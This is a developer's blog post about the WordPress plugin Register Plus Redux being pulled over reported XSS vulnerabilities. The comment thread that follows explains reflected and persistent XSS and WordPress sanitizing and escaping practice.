Register Plus Redux was removed after the following vulnerabilities disclosed to packetstormsecurity.org were forwarded to plugins@wordpress.org.
http://websecurity.com.ua/4542/ dated 9/18/2010
http://websecurity.com.ua/5089/ dated 4/18/2011
At the time, I didn’t think much of these vulnerabilities. To be honest, I still don’t. I couldn’t figure out how to replicate them. To be honest, I still can’t. Maybe that makes me a buffoon, I don’t know. The fact that they are in Ukrainian, certainly didn’t help. On top of that, I just don’t get it.
My knowledge of XSS is limited to the following. When you take information from HTTP GET or POST, you need to validate it because anyone can spoof that data. OK, cool. I try to keep that in mind, I think I do OK in that regard, although I did find a couple oversights following this whole debacle.
My problem, I think, might be philosophical. Honestly, being that I am a self-taught programmer, words escape me trying to explain my “philosophy”, for lack of a better word. On the Settings page, I allow HTML to be entered in custom messages. Such as when someone goes to the Registration page and you want it to say, “You will need a confirmation number to register, <click here> for more information.” In the code I received from MustLive that is prohibited. And here is where his report and my knowledge diverge.
Is there a potential for the HTTP POST information to be modified, thus setting that message to something malicious that… I don’t know, yanks cookies and sends them to some far off bad guy, for example. Sure. But, I use a nonce and check_admin_referer as recommended my WordPress, and, as far as I know, as used by WordPress core. Whenever possible, I have referred to WordPress core files and used the same syntax and functions used on core pages. So, how is Redux any more vulnerable? I just don’t understand and I scratched my head for a while, and then gave up.
But from time to time, I think, maybe I just didn’t look at it hard enough, maybe I’ll see something new. Still nothing. So last week, I turned to the internet.
This is a more specific problem that MustLive pointed out. However, I figured it was one of the easier ones to recreate without getting into WordPress as a whole.
Surprisingly, to me, no true replies. Not to attack the only person who responded at all, Jonathan Rowny, but his response to me, just sounds more of paranoia. This “problem” was big enough to get Redux yanked, but yet the only solution is to prohibit any HTML and reduce functionality, for what?
Anyway, I don’t want to dismiss MustLive, Jonathan Rowny, or anyone else that ever asked me about this or sent me a message. Nevertheless, I still don’t know what to do to make them happy, and you, constant user, secure. I would run this plugin on my page. I do. Not for any reason, there’s no point in registering here, just so I can test it myself.
Long story short, I just don’t know what to do, and we are still where we were a year ago.
Hi radiok,
Have you tried to contact plugins@worpress.com?
Or maybe Otto?
Cheers,
Gabriel
I haven’t, but I’ve been hoping to have more resolution before I do. Maybe I should just bite the bullet, but I have a deafening fear of sounding stupid!
Hi,
The correct email is plugins@wordpress.org
Otto is very clever and surely would be able to provide a clear explanation of the issue.
Regards,
Gabriel
A “Reflected” XSS hole is the most commonplace one. This sort of attack happens when you take input from the user, and spit it back out into the resulting page without sanitizing it first. In other words, if I can put in HTML, and have that HTML sent back to me in the HTML page, then you have a reflected XSS hole.
A “persistent” XSS hole is much the same, but it’s where the data is stored in the database instead. An example of this would be somebody leaving a comment, and putting a script tag in there.
The reason this is bad is because now I have the ability to trick somebody else into running arbitrary HTML within the context of your website. In other words, I can build a special link to your site, trick you into clicking on it somehow, and then have it run my javascript on your site. I can use this to have it send me your cookies, and thus I can become you. Or I can use it to have you perform actions on your site, and automatically add spam to your posts. Or whatever I want, because once I have my script running in the context of your website and *in your browser* then I essentially am “you” and can do anything you can do.
The solution: Never, ever, trust user input. Sanitize it. If you want them to be able to input HTML, then that’s fine. But you don’t instantly spit that HTML back out to them without sanitizing it. If it’s supposed to be in a textarea for them to edit, then you must use esc_textarea on it before outputting it. If it’s supposed to be displayed on the page, then you use esc_html on it. If you don’t really need them to be able to use “arbitrary” HTML, then you can run it through kses to limit the sort of HTML they can use, in the same way that this comments box only allows a small number of tags to be used. At an absolute minimum, you never allow them to input scripts.
I feel a bit like a celebrity just posted on my site! Anyway, I have a question for you, since you are here and all. Should I be sanitizing before the database commit, when displaying, or both? I feel like it’s a bit wasteful to sanitize in and out. I was thinking on display only since it’s possible the database was compromised some other way. But at the same time, I don’t want to be the one compromising it, so maybe I should do both! Argh! I complicate my own questions. Anyway, your thoughts?
Hi radiok,
That one is easy, sanitize both.
http://codex.wordpress.org/Data_Validation
Regards,
Gabriel
Actually, it looks like the golden rule is, “sanitize on input, escape on output” so that’s what I am reviewing now.
Any progress on this? I would love to see this plugin return!
My work has gotten away from me again a bit. I’ll try and get the in progress version up sooner then later.
Just wanted to follow up and see where this is at… I love this plugin and would love to see it return.
i love this plugin, currently using it from the wordpress plugin site, is it secure now? Also, if you could add controls for background color and text, this would be perfect. Thank you
art, thank you! Redux has been secured and I have received no notification of anything to the contrary. I resolved all known security risks and a few unknown ones at the same time. Redux offers and option for custom css, you can use that to change the background color to anything you can imagine! If you need help experimenting post more specifics and I will assist when I have a chance.